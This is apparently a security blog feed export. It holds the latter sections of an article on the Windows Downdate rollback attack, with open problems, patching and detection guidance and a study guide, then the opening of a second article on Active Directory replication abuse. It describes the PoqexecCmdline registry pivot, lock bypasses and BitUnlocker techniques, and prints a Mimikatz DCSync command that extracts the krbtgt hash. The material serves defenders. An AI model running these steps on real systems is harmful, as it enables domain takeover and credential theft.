&lt;h3&gt;8.2 The internal tension&lt;/h3&gt;
&lt;p&gt;That position has an obvious problem. The VBS documentation says VBS &lt;em&gt;assumes the kernel can be compromised&lt;/em&gt; [@msdocs-vbs]. The Secure Kernel exists because the NT kernel is, in the threat model VBS publishes, untrusted. If the kernel is the attacker, then anyone who can compromise the kernel is the attacker VBS is designed to mitigate. On a single-user Windows machine, the obvious path to kernel compromise is to be an Administrator and load a vulnerable signed driver, or to be an Administrator and exploit a kernel race, or to be an Administrator and downgrade &lt;code&gt;ci.dll&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Leviev makes the point directly in the same blog post: &lt;em&gt;&quot;the reason VBS was created is because the kernel is assumed compromised, and there was a need for a secure place to implement security features&quot;&lt;/em&gt; [@safebreach-2024-aug]. If the kernel is &lt;em&gt;assumed&lt;/em&gt; compromised in VBS&apos;s threat model, then the Administrator who can compromise the kernel is precisely the attacker VBS was built to mitigate -- which makes Microsoft&apos;s servicing-criteria position and VBS&apos;s threat model load-bearing on opposite sides of the same boundary.&lt;/p&gt;
&lt;p&gt;This is the article&apos;s most argumentative sentence: the position is not a &lt;em&gt;security&lt;/em&gt; decision (the primitive is not a vulnerability) but a &lt;em&gt;resourcing&lt;/em&gt; decision (we will not CVE the primitive, but we will harden it). The per-component &lt;code&gt;SkuSiPolicy.p7b&lt;/code&gt; rollout, the default-enabled boot-session CI policy, DRTM on Win11 24H2+, and the multi-quarter cleanup across Windows 10 1507 through Windows Server 2018 are exactly what one would expect from an organisation patching a &lt;em&gt;class&lt;/em&gt; one component at a time, while declining to declare the class.&lt;/p&gt;
&lt;h3&gt;8.3 What a hardened position would look like&lt;/h3&gt;
&lt;p&gt;The fixes are not conceptually hard. Microsoft could:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Sign &lt;code&gt;poqexec.exe&lt;/code&gt; and &lt;code&gt;sfc.exe&lt;/code&gt; with HVCI-enforced integrity.&lt;/strong&gt; That removes the persistence and irreversibility steps of the chain.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Move &lt;code&gt;PoqexecCmdline&lt;/code&gt; under a TrustedInstaller-only DACL with a UEFI-bound mirror.&lt;/strong&gt; That removes the registry pivot.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Introduce a monotonic update-generation counter in the TPM, bound to a transcript hash of the cumulative-update history, consulted by the boot manager and the Secure Kernel.&lt;/strong&gt; That is the architectural fix -- the version of the answer Apple and Android shipped.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The current &lt;code&gt;SkuSiPolicy.p7b&lt;/code&gt; mechanism is the &lt;em&gt;first step&lt;/em&gt; on the third path. It is per-component and opt-in for the strong variant, but the conceptual shape is right: a Microsoft-signed list of historical hashes, consulted by the kernel loader, with a UEFI-bound anchor for the strong configuration [@kb5042562]. The work is real, and it is well-executed within the constraints Microsoft has set itself. The question is whether the constraints will give. Whether the policy will eventually cover every Microsoft-shipped binary with a known EoP. Whether the strong variant will become the default. Whether Administrator-to-kernel will be declared a security boundary in the published criteria.&lt;/p&gt;

The one VBS configuration that Leviev has not bypassed is the &quot;Mandatory&quot; flag (the `HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Mandatory` REG_DWORD value, mirrored into the `VbsPolicy` UEFI variable on next boot). When set in combination with the UEFI lock, the flag causes boot failure if any VBS-protected binary is corrupted -- so the &quot;invalidate `securekernel.exe`, boot without VBS, downgrade `ci.dll`&quot; trick that defeats the ordinary UEFI lock no longer works. Leviev&apos;s October 2024 follow-up is blunt: *&quot;I have not found a way around this&quot;* [@safebreach-2024-oct].&lt;p&gt;The catches are operational. The Mandatory flag is not set by default when the UEFI lock is enabled; it has to be set manually. Once set with the UEFI lock, the VBS configuration cannot be modified -- the lock must be deleted via &lt;code&gt;SecConfig.efi&lt;/code&gt;, the flag set, and the lock re-enabled.&lt;/p&gt;
&lt;p&gt;There is also a real boot-reliability risk: any update that corrupts a VBS-protected binary on a Mandatory-flagged machine will brick the boot, with no error displayed beyond the firmware silently moving to the next boot option [@safebreach-2024-oct; @kb5042562]. Microsoft documented the Mandatory flag in September 2024, after Leviev&apos;s findings, but has not made it the default [@msdocs-vbs-hvci]. Few production machines run with it.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;These are not conceptually hard. They are organisationally hard, because they require Microsoft to ship a &lt;em&gt;new&lt;/em&gt; security boundary, declared as such, after declining to do so for nearly two decades.&lt;/p&gt;
&lt;h2&gt;9. Open Problems -- What the August 2024 Cadence Left Open&lt;/h2&gt;
&lt;p&gt;If you are reading this in 2026, the parts of Windows Downdate that Microsoft chose to call vulnerabilities have been patched. The parts they chose not to call vulnerabilities are exactly as exploitable today as they were on August 7, 2024.&lt;/p&gt;
&lt;p&gt;The general primitive remains. The Administrator-context modification of &lt;code&gt;PoqexecCmdline&lt;/code&gt; is, by Microsoft&apos;s stated policy, intentionally unpatched [@safebreach-2024-oct]. Every cumulative update Microsoft ships will continue to flow through the same servicing-stack path that Leviev hijacked, because that path is the path everything else depends on. The fix has to come from somewhere else.&lt;/p&gt;
&lt;h3&gt;Components not yet in the revocation policy&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;SkuSiPolicy.p7b&lt;/code&gt; covers the VBS-protected components Leviev demonstrated against -- &lt;code&gt;securekernel.exe&lt;/code&gt;, &lt;code&gt;hvix64.exe&lt;/code&gt;, &lt;code&gt;hvax64.exe&lt;/code&gt;, &lt;code&gt;LsaIso.exe&lt;/code&gt;, &lt;code&gt;ci.dll&lt;/code&gt;, and others. It does not cover every Microsoft-shipped DLL or driver with a public EoP history [@kb5042562]. Each Microsoft binary outside the policy that has a known kernel-relevant vulnerability is, in principle, a Downdate target. The inventory is open. Microsoft does not publish &quot;the set of historical hashes of &lt;code&gt;ntoskrnl.exe&lt;/code&gt; that we consider unsafe to load&quot; -- and the absence of that list is the absence of the version-monotonicity boundary at scale.&lt;/p&gt;
&lt;h3&gt;Hot Patching as a parallel servicing surface&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/from-hotpatch-to-150-a-core-the-live-patch-pipeline-microsof/&quot; rel=&quot;noopener&quot;&gt;Hot Patching&lt;/a&gt; is the Windows servicing variant that applies code-level updates to running processes without a reboot. It reached general availability on Windows Server 2022 Datacenter: Azure Edition in February 2022 (Server Core) and July 2023 (Desktop Experience), and on Windows 11 Enterprise 24H2 in April 2025 via Microsoft Autopatch and Intune [@msdocs-hotpatch-server; @msdocs-hotpatch-win11].&lt;/p&gt;
&lt;p&gt;Its threat model is &lt;em&gt;forward-delta application&lt;/em&gt;: how do we apply a code patch to a running binary safely? It does not consider &lt;em&gt;rollback prevention&lt;/em&gt; as a separate concern. Whether the hot-patch path admits its own rollback primitive -- whether you can roll back a hot patch, restoring the older code into the running process, by abusing the hot-patch infrastructure the same way Downdate abuses CBS -- is an open question that nobody has publicly answered.&lt;/p&gt;
&lt;h3&gt;WinRE as adjacent surface&lt;/h3&gt;
&lt;p&gt;Leviev&apos;s Black Hat USA 2025 talk, with Netanel Ben Simon of Microsoft&apos;s MORSE team, did not extend Downdate. It went sideways. &lt;em&gt;BitUnlocker: Leveraging Windows Recovery to Extract BitLocker Secrets&lt;/em&gt; targeted the &lt;a href=&quot;https://paragmali.com/blog/the-day-85-million-devices-couldnt-boot----and-how-microsoft/&quot; rel=&quot;noopener&quot;&gt;Windows Recovery Environment&lt;/a&gt;, demonstrating four CVEs that together permit a physical-access attacker to extract BitLocker keys from the WinRE servicing surface [@itnews-bitunlocker; @infocondb-defcon33-bitunlocker]. The bugs were patched in the July 2025 Patch Tuesday cumulative updates.&lt;/p&gt;

The corrected CVE-to-file mapping, per the iTnews coverage and the independent garatc/BitUnlocker proof-of-concept, is:
- **CVE-2025-48804**: SDI / `Boot.sdi` parsing -- the boot-manager downgrade keystone that garatc&apos;s PoC chains to access BitLocker-encrypted disks in under five minutes on fully patched Windows 11 [@itnews-bitunlocker; @garatc-bitunlocker].
- **CVE-2025-48800**: Offline Scanning -- abuses the legitimately-signed time-travel debugger `tttracer.exe` to proxy-execute `cmd.exe` against BitLocker-encrypted volumes without triggering the recovery-mode re-lock.
- **CVE-2025-48003**: `SetupPlatform.exe` and the Shift+F10 path via `ReAgent.xml`.
- **CVE-2025-48818**: BCD-store complete-chain exploit.&lt;p&gt;BitUnlocker is not a continuation of Windows Downdate. It is the same meta-pattern in a different servicing surface: WinRE is a servicing path inherited from a less hostile era, and Microsoft is now patching its threat model. The shape of the work is identical.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Alon Leviev now works on the Microsoft Offensive Research and Security Engineering (MORSE) team alongside Netanel Ben Simon. Leviev&apos;s institutional follow-up to Downdate is therefore happening from inside Microsoft -- a notable signal about how seriously Microsoft is taking the surface even as it declines to declare the boundary [@infocondb-defcon33-bitunlocker].&lt;/p&gt;
&lt;h3&gt;Two revocation policies, one product&lt;/h3&gt;
&lt;p&gt;The Microsoft Vulnerable Driver Blocklist (for third-party kernel code) and &lt;code&gt;SkuSiPolicy.p7b&lt;/code&gt; (for first-party VBS system files) are &lt;em&gt;two separate revocation policies&lt;/em&gt; that ship on different cadences, in different formats, and through different update channels. The Driver Blocklist updates quarterly and via monthly cumulative updates [@msdocs-driver-blocklist]; &lt;code&gt;SkuSiPolicy.p7b&lt;/code&gt; is shipped as part of major mitigation rollouts and is opt-in for the strong variant [@kb5042562]. Whether Microsoft unifies them -- whether the eventual answer is one unified hash-revocation policy covering all kernel-loaded code, Microsoft-shipped or not -- is an open architectural question.&lt;/p&gt;
&lt;h3&gt;Linux desktop coverage&lt;/h3&gt;
&lt;p&gt;The image-based Linux distributions (Fedora Silverblue, Ubuntu Core, openSUSE MicroOS) have all moved toward AVB-style or SSV-style architectures. Classical &lt;code&gt;dpkg&lt;/code&gt;- and &lt;code&gt;rpm&lt;/code&gt;-based distributions have not. Apt&apos;s package authentication is signature-based and largely version-aware via the &lt;code&gt;Release&lt;/code&gt; file&apos;s &lt;code&gt;Date&lt;/code&gt; and &lt;code&gt;Valid-Until&lt;/code&gt; headers, but the security guarantees rely on a trusted repository and a TUF-style snapshot role that most distributions do not yet ship. The Windows lesson generalises: any update mechanism that can write into a higher-privilege domain has to enforce version monotonicity in the same domain that performs the write.&lt;/p&gt;
&lt;p&gt;There is one open problem the rest depend on. &lt;em&gt;Will Microsoft declare a version-monotonicity security boundary?&lt;/em&gt; The answer to that question -- whether by a future revision of the Windows Security Servicing Criteria, by a default-on Mandatory flag, by an exhaustive first-party Driver Block List equivalent, or by something nobody has prototyped yet -- is the substantive resolution of the story. The August 2024 patches were not it.&lt;/p&gt;
&lt;h2&gt;10. A Practical Guide for Defenders, Detection Engineers, and System Designers&lt;/h2&gt;
&lt;p&gt;Three audiences, three concrete tracks.&lt;/p&gt;
&lt;h3&gt;10.1 Defenders&lt;/h3&gt;
&lt;p&gt;If you operate Windows 10 or 11 endpoints, the first thing to do is apply the cumulative updates that contain the substantive code fix for CVE-2024-38202. On Windows 11 24H2, that is KB5044284 (October 8, 2024, OS Build 26100.2033) [@kb5044284]. On older SKUs, the equivalent updates landed on the same date or in the multi-quarter sweep that completed July 8-10, 2025 across Windows 10 1507, 1607, 1809, Server 2016, and Server 2018 [@nvd-cve-2024-21302]. Apply them in your normal patch ring with no special handling.&lt;/p&gt;
&lt;p&gt;The second thing to do is keep HVCI / memory integrity enabled so the default-enabled boot-session CI policy and the Vulnerable Driver Blocklist both fire [@msdocs-driver-blocklist; @msdocs-vbs-hvci]. On Windows 11 22H2 and later, both are on by default. On older SKUs, they are not, and the gap is meaningful.&lt;/p&gt;
&lt;p&gt;The third thing -- the one that requires care -- is to consider deploying &lt;code&gt;SkuSiPolicy.p7b&lt;/code&gt; with the optional UEFI lock where your operational risk tolerance allows.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft&apos;s own KB is unambiguous about what happens if you apply the UEFI lock and later try to roll back: &lt;em&gt;&quot;If the UEFI lock is applied and the policy is removed or replaced with an older version, the Windows boot manager will not start, and the device will not start... Even reformatting the disk will not remove the UEFI lock of the mitigation if it has already been applied&quot;&lt;/em&gt; [@kb5042562]. Disable Secure Boot to remove the lock. Test on a pilot ring before deploying broadly. Back up BitLocker recovery keys first. Verify that the Windows Recovery Environment is updated to the latest Safe OS Dynamic Update (released July 8, 2025) before applying [@kb5042562].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A safe deployment plan: (1) pick a pilot ring of representative hardware; (2) verify each pilot machine has the July 8, 2025 WinRE Safe OS Dynamic Update applied; (3) back up BitLocker recovery keys to a secondary store you control; (4) deploy &lt;code&gt;SkuSiPolicy.p7b&lt;/code&gt; from &lt;code&gt;%windir%\System32\SecureBootUpdates\&lt;/code&gt; to the EFI System Partition&apos;s &lt;code&gt;\EFI\Microsoft\Boot\&lt;/code&gt; directory &lt;em&gt;without&lt;/em&gt; the UEFI lock first; (5) verify boot integrity for several reboot cycles; (6) apply the UEFI lock; (7) confirm no other CI policy is being shipped that conflicts; (8) graduate the policy to the wider fleet.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Finally: the VBS &quot;Mandatory&quot; flag (&lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Mandatory&lt;/code&gt;) is the only configuration Leviev has not bypassed [@safebreach-2024-oct]. Set it where boot reliability is acceptable and you have rehearsed the recovery procedure (&lt;code&gt;SecConfig.efi&lt;/code&gt; to delete the lock, the flag set, the lock re-enabled). Inventory the count of Administrator accounts on each machine -- the Downdate primitive&apos;s blast radius is bounded by the number of identities that can write &lt;code&gt;PoqexecCmdline&lt;/code&gt;. Every reduction in that count is a direct reduction in the attack surface.&lt;/p&gt;
&lt;h3&gt;10.2 Detection engineers&lt;/h3&gt;
&lt;p&gt;The detection signature is the registry pivot. Authenticode-based file-integrity tooling will &lt;em&gt;not&lt;/em&gt; catch Windows Downdate, because the downgraded files are legitimately Microsoft-signed [@safebreach-2024-aug]. The Splunk Security Content &lt;code&gt;windows_downdate_registry_activity&lt;/code&gt; analytic is the canonical reference detection [@splunk-downdate-detection]. The logic is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Consume Sysmon EventIDs 12, 13, and 14 (Registry creation, set-value, and rename).&lt;/li&gt;
&lt;li&gt;Match &lt;code&gt;TargetObject&lt;/code&gt; against &lt;code&gt;*PoqexecCmdline&lt;/code&gt; or &lt;code&gt;*COMPONENTS\PendingXmlIdentifier&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Suppress writes whose calling &lt;code&gt;ProcessPath&lt;/code&gt; is under &lt;code&gt;*:\Windows\WinSxS\*&lt;/code&gt; (the legitimate-update path).&lt;/li&gt;
&lt;li&gt;Map to MITRE ATT&amp;amp;CK T1112 (Modify Registry, Defense Impairment) and T1689 (Downgrade Attack, Persistence/Exploitation/Installation).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Splunk detection is &lt;em&gt;disabled by default&lt;/em&gt; in Splunk Enterprise Security. Operators must enable it explicitly [@splunk-downdate-detection]. The point of attack on the EDR side is the registry pivot, not the file substitution -- the substitution looks like a normal update because, by every check Windows performs, it is one.&lt;/p&gt;
&lt;p&gt;{`
// Demonstrates the decision logic of the windows_downdate_registry_activity detection.
// Not a real Sysmon parser -- the inputs would be Event 12/13/14 records in production.&lt;/p&gt;
&lt;p&gt;function isLegitimateUpdatePath(processPath) {
  // Legitimate Windows Update operations run under WinSxS.
  return processPath.toLowerCase().includes(&apos;\\windows\\winsxs\\&apos;);
}&lt;/p&gt;
&lt;p&gt;function classifyRegistryWrite(event) {
  const sensitiveValues = [
    &apos;PoqexecCmdline&apos;,
    &apos;COMPONENTS\\PendingXmlIdentifier&apos;
  ];&lt;/p&gt;
&lt;p&gt;  const matchesSensitive = sensitiveValues.some(v =&amp;gt;
    event.TargetObject.endsWith(v)
  );&lt;/p&gt;
&lt;p&gt;  if (!matchesSensitive) return &apos;ignore&apos;;
  if (isLegitimateUpdatePath(event.ProcessPath)) return &apos;allow&apos;;
  return &apos;alert&apos;;
}&lt;/p&gt;
&lt;p&gt;const sample = [
  { TargetObject: &apos;HKLM\\...\\PoqexecCmdline&apos;, ProcessPath: &apos;C:\\Windows\\WinSxS\\amd64_x\\TrustedInstaller.exe&apos; },
  { TargetObject: &apos;HKLM\\...\\PoqexecCmdline&apos;, ProcessPath: &apos;C:\\Users\\alice\\Desktop\\windows_downdate.exe&apos; },
  { TargetObject: &apos;HKLM\\...\\COMPONENTS\\PendingXmlIdentifier&apos;, ProcessPath: &apos;C:\\tools\\suspicious.exe&apos; }
];&lt;/p&gt;
&lt;p&gt;for (const ev of sample) {
  console.log(classifyRegistryWrite(ev), &apos;&amp;lt;-&apos;, ev.ProcessPath);
}
`}&lt;/p&gt;

The Splunk detection only watches the two registry pivots. A more aggressive variant also watches for unexpected `pending.xml` files appearing outside `C:\Windows\WinSxS\` and for file integrity changes against expected hashes of `poqexec.exe` and `sfc.exe`. The trade-off is false positives: enterprise patch tooling and configuration-management agents touch the servicing path more often than you would expect, and an aggressive variant requires tuning before it is fleet-ready.
&lt;h3&gt;10.3 System designers&lt;/h3&gt;
&lt;p&gt;If you are building a new operating system in 2026, you do not have an excuse. The architectural takeaway from Windows Downdate is general: &lt;em&gt;any update mechanism that can write into a higher-privilege domain must enforce version monotonicity in the same domain that performs the write.&lt;/em&gt; If the update is processed by a TrustedInstaller-context service, version monotonicity has to be enforced by TrustedInstaller (or by something even further from the attacker -- the boot manager, the firmware, the TPM). If the version-state pointer lives in a registry value an Administrator can rewrite, the boundary moves and the design is broken.&lt;/p&gt;
&lt;p&gt;Concrete reference patterns are available:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;TPM-stored generation counters.&lt;/strong&gt; Bind the counter to a transcript hash of the cumulative-update history; the boot manager and Secure Kernel refuse to load components older than the stored counter [@tuf-spec]. This is the Apple SSV / Android AVB pattern translated into Windows-shaped trust roots.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monotonic catalog versions.&lt;/strong&gt; Sign the per-component catalog with an explicit &lt;code&gt;&amp;lt;min-version&amp;gt;&lt;/code&gt; field; the kernel loader refuses to load any catalog whose &lt;code&gt;&amp;lt;min-version&amp;gt;&lt;/code&gt; is below the loader&apos;s stored maximum. This is the TUF snapshot-role pattern [@tuf-spec].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;In-protocol monotonicity at the update edge.&lt;/strong&gt; Use the IETF SUIT envelope format and the &lt;code&gt;seq-num&lt;/code&gt; field defined in RFC 9019 [@rfc9019]. The receiver tracks the highest sequence number it has seen and refuses lower ones at the spec level, not the policy level.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The reference designs exist. TUF [@tuf-spec], IETF SUIT [@rfc9019], and AOSP AVB [@aosp-avb] are open. Pick one. Adapt it. Ship it. The hard part is not the engineering. The hard part is the institutional commitment to declaring a security boundary you did not declare last year.&lt;/p&gt;
&lt;p&gt;If you are building a new OS in 2026, you do not have an excuse.&lt;/p&gt;
&lt;h2&gt;11. Misconceptions, Corrections, and What Comes Next&lt;/h2&gt;
&lt;p&gt;Windows Downdate spawned a press cycle that got several things wrong. Here is what is actually true.&lt;/p&gt;

No. The substantive code fix for CVE-2024-38202 (the basic-user-induced restore-point variant) shipped on **October 8, 2024** as KB5044284 for Windows 11 24H2 and OS Build 26100.2033, with per-SKU equivalents on the same date [@kb5044284; @nvd-cve-2024-38202]. The earlier mitigation guidance, KB5042562 (the opt-in `SkuSiPolicy.p7b` policy and the default-enabled boot-session CI policy), shipped on August 13, 2024 [@kb5042562]. There is no November 2024 anchor. The multi-quarter cleanup across older SKUs completed July 8-10, 2025 [@nvd-cve-2024-21302].

No. *Secure Boot* bypass via downgrade is BlackLotus (CVE-2022-21894, &quot;Baton Drop&quot;), which used a vulnerable Microsoft-signed `bootmgfw.efi` that was not in the UEFI `dbx` revocation list [@welivesecurity-blacklotus]. Windows Downdate bypasses *VBS UEFI locks* and downgrades the VBS-protected components (`securekernel.exe`, `hvix64.exe`, `LsaIso.exe`, `ci.dll`) along with the NT kernel itself [@safebreach-2024-aug]. The two attacks operate at different layers: BlackLotus at the firmware/boot manager, Downdate at the OS component layer. The mechanism shape is similar; the targets are distinct.

No. *ItsNotASecurityBoundary* is Gabriel Landau&apos;s (Elastic Security Labs) exploit name for a False File Immutability TOCTOU on `ci.dll`, disclosed in early 2024 and patched in **May 14, 2024 (KB5037771)** with a preview build on April 23, 2024 (KB5036980) [@landau-itsnotasecurityboundary-repo; @elastic-ffi]. Leviev&apos;s October 26, 2024 SafeBreach follow-up *revived* Landau&apos;s exploit by using Windows Downdate to roll `ci.dll` back to the pre-May build [@safebreach-2024-oct]. Leviev&apos;s actual Black Hat USA 2025 talk, with Netanel Ben Simon, was **BitUnlocker**, on Windows Recovery Environment attacks -- patched in July 2025 Patch Tuesday [@itnews-bitunlocker; @infocondb-defcon33-bitunlocker].

No. Microsoft assigned and patched both CVEs from disclosure day (August 7, 2024) onward [@nvd-cve-2024-21302; @nvd-cve-2024-38202]. The position that Microsoft *has* taken is narrower: the underlying *primitive* (the Administrator-context modification of `PoqexecCmdline` that the Downdate technique relies on) has remained unpatched because it does not cross a defined security boundary in the published Windows Security Servicing Criteria [@safebreach-2024-oct; @msft-servicing-criteria]. The two assigned CVEs are the *boundary-crossing parts* of the chain. The unassigned primitive is the part that runs on each side of the boundary that nobody declared.

No. Authenticode does what it says: it verifies that a binary was signed by a specific certificate (and that the certificate chains to a trusted root). The older `ci.dll` that Windows Downdate installs is legitimately signed by Microsoft. Authenticode never claimed to assert &quot;and is the current version&quot; -- it is a *signature* check, not a *staleness* check [@safebreach-2024-aug; @msdocs-driver-signing]. The mistake is in the design above Authenticode that treats signature validity as equivalent to current-version-validity, not in Authenticode itself.

Per Leviev&apos;s claim in the August 2024 SafeBreach blog, `poqexec.exe` is not Authenticode-signed in the affected Windows builds, and neither is `sfc.exe` [@safebreach-2024-aug]. The persistence step of Windows Downdate exploits this directly: replacing `poqexec.exe` with a patched copy that NOPs future updates does not require a code-signing bypass. The hardening suggested in section 8 -- sign both binaries, enforce HVCI on them -- removes the persistence and irreversibility steps, but signing alone is not sufficient: the `PoqexecCmdline` registry pivot survives signing, because the pivot points the *legitimately signed* `poqexec.exe` at an attacker-chosen action list.

EDR coverage focuses on the known indicators: registry writes to `PoqexecCmdline` and `PendingXmlIdentifier` by processes that are not under `C:\Windows\WinSxS\`, and unexpected `pending.xml` files outside the TrustedInstaller-only directories [@splunk-downdate-detection]. The downgrade itself, once executed, is by design indistinguishable from a legitimate update at the file-signature layer. Whether a given EDR product has shipped a detection for the registry pivot is product-specific; the Splunk Security Content analytic referenced above is the cleanest published reference signature [@splunk-downdate-detection]. Microsoft Defender for Endpoint operators should verify with their account team that an equivalent detection is enabled in their tenant.
&lt;p&gt;Microsoft built a security boundary in 2007 that depended on the assumption that updates only move forward. We now know they do not. The work of declaring the new boundary -- one component, one SKU, one cumulative update at a time -- is what Microsoft is doing right now. Whether the boundary will eventually be declared in the Windows Security Servicing Criteria, rather than implemented quietly as a per-component policy, is the question whose answer we will know in 2027.&lt;/p&gt;
&lt;p&gt;For now, the lesson is portable. The shape of Windows Downdate generalises: every signed-update system needs a version-monotonicity primitive co-located with the trust root that enforces signatures. The reason it took until 2024 to demonstrate this on Windows is not that the bug was deep. It is that nobody, in eighteen years of Windows servicing engineering, had been asked to declare the boundary the bug crossed. Once Leviev asked the question, the answer wrote itself.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-downdate-when-the-update-itself-is-the-attack&quot; keyTerms={[
  { term: &quot;TrustedInstaller&quot;, definition: &quot;A Windows security principal introduced in Vista that owns most system files. ACLs deny direct write to other principals, including Administrators.&quot; },
  { term: &quot;Component-Based Servicing (CBS)&quot;, definition: &quot;The Vista-era Windows servicing architecture that replaced self-extracting installers with manifest-and-catalog-driven transactions over a versioned component store (WinSxS).&quot; },
  { term: &quot;poqexec.exe&quot;, definition: &quot;The post-reboot Primitive Operations Queue executor. Reads pending.xml at next boot and applies its verbs (HardlinkFile, MoveFile, ...).&quot; },
  { term: &quot;PoqexecCmdline&quot;, definition: &quot;The Administrator-writable registry value that tells poqexec.exe which pending.xml to parse on next boot. The Windows Downdate primitive.&quot; },
  { term: &quot;SkuSiPolicy.p7b&quot;, definition: &quot;A Microsoft-signed Code Integrity policy that revokes specific versions of VBS system files. Shipped in KB5042562, August 2024.&quot; },
  { term: &quot;VBS UEFI lock&quot;, definition: &quot;A configuration mode for Virtualization-Based Security that pins the VBS configuration into a UEFI non-volatile variable. Pins configuration, not implementation.&quot; },
  { term: &quot;DRTM&quot;, definition: &quot;Dynamic Root of Trust for Measurement. On Win11 24H2+, binds Virtual Secure Mode protected keys to the active CI policy version.&quot; },
  { term: &quot;False File Immutability (FFI)&quot;, definition: &quot;Gabriel Landau&apos;s bug class. Windows treats SEC_IMAGE-mapped files as immutable, but the kernel does not consistently honor that immutability across separate reads -- enabling TOCTOU on catalogs.&quot; }
]} questions={[
  { q: &quot;Why does Leviev&apos;s attack succeed even though every binary Windows loads is legitimately Microsoft-signed?&quot;, a: &quot;Because Authenticode and the CBS catalog-trust model assert signature validity, not version currency. A 2022 ci.dll is signed by the same Microsoft key as a 2024 ci.dll.&quot; },
  { q: &quot;Which registry value is the pivot at the heart of Windows Downdate, and what is its ACL?&quot;, a: &quot;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Configuration\PoqexecCmdline. The DACL allows Administrator write, breaking the TrustedInstaller-only chain of custody for the action list pointer.&quot; },
  { q: &quot;What does the VBS UEFI lock pin, and what does it not pin?&quot;, a: &quot;It pins VBS configuration (the VbsPolicy UEFI variable). It does not pin VBS implementation (securekernel.exe, hvix64.exe, LsaIso.exe, ci.dll). Downgrading the implementation while leaving the configuration alone is the attack.&quot; },
  { q: &quot;How is the rollback-defence story different on Android and Apple platforms?&quot;, a: &quot;Android AVB stores per-partition rollback indices in TrustZone or RPMB. Apple SSV signs a Merkle tree over the whole system volume. Both are structural and mandatory. Windows SkuSiPolicy.p7b is shipped via the same update channel as the components it protects, with an opt-in UEFI lock for the strong variant.&quot; },
  { q: &quot;Why does Microsoft consider the underlying Downdate primitive (modifying PoqexecCmdline) not a security vulnerability?&quot;, a: &quot;Because the Windows Security Servicing Criteria does not enumerate Administrator-to-kernel as a security boundary. Per Microsoft&apos;s published policy, gaining kernel code execution as an Administrator does not violate the goal or intent of any declared boundary, so the primitive falls outside the servicing-CVE process.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>downgrade-attack</category><category>vbs</category><category>hvci</category><category>windows-update</category><category>security-boundary</category><category>patch-management</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Two Checkmarks and the Keys to the Kingdom: How Active Directory&apos;s Replication Protocol Became the Longest-Lived Credential Attack on Windows</title><link>https://paragmali.com/blog/two-checkmarks-and-the-keys-to-the-kingdom-how-active-direct/</link><guid isPermaLink="true">https://paragmali.com/blog/two-checkmarks-and-the-keys-to-the-kingdom-how-active-direct/</guid><description>MS-DRSR was designed for domain controllers to replicate secrets to each other. Its access check gates on an ACL, not on whether the caller is a DC. Eleven years after Mimikatz proved it, no patch can fix it.</description><pubDate>Thu, 21 May 2026 00:00:00 GMT</pubDate><content:encoded>
Active Directory&apos;s replication protocol (MS-DRSR) lets any domain controller pull every secret in the directory from any other domain controller, and the access check gates on an ACL, not on whether the caller is actually a DC. Mimikatz&apos;s `lsadump::dcsync` (August 11, 2015) and `lsadump::dcshadow` (January 2018) are the read and write sides of this loophole; both remain in active operational use eleven years later because the protocol cannot be amended without breaking AD replication. Credential Guard cannot help -- the secret moves from a remote DC&apos;s NTDS.dit over the network, never touching the attacker&apos;s LSASS. The 2026 defender response is four parallel detection layers (posture, behavioral, network, graph) because no single layer catches every case, and the architectural fifth layer that would close the class is not coming.
&lt;h2&gt;1. Two Checkmarks and the Keys to the Kingdom&lt;/h2&gt;
&lt;p&gt;A non-admin service account, created during a 2017 file-server migration and never cleaned up, holds exactly two access-control entries on the &lt;code&gt;contoso.local&lt;/code&gt; domain object: &lt;code&gt;Replicating Directory Changes&lt;/code&gt; and &lt;code&gt;Replicating Directory Changes All&lt;/code&gt;. From a Windows 11 workstation -- not a domain controller, not a tier-zero admin host, just a desk -- the attacker opens a Mimikatz prompt and types:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;lsadump::dcsync /domain:contoso.local /user:krbtgt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Sixty seconds later they have the &lt;code&gt;krbtgt&lt;/code&gt; NT hash and &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Kerberos AES keys&lt;/a&gt;, and they own the domain. &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt;, enabled on every workstation in the building, never saw the credential transit anywhere in its scope.&lt;/p&gt;
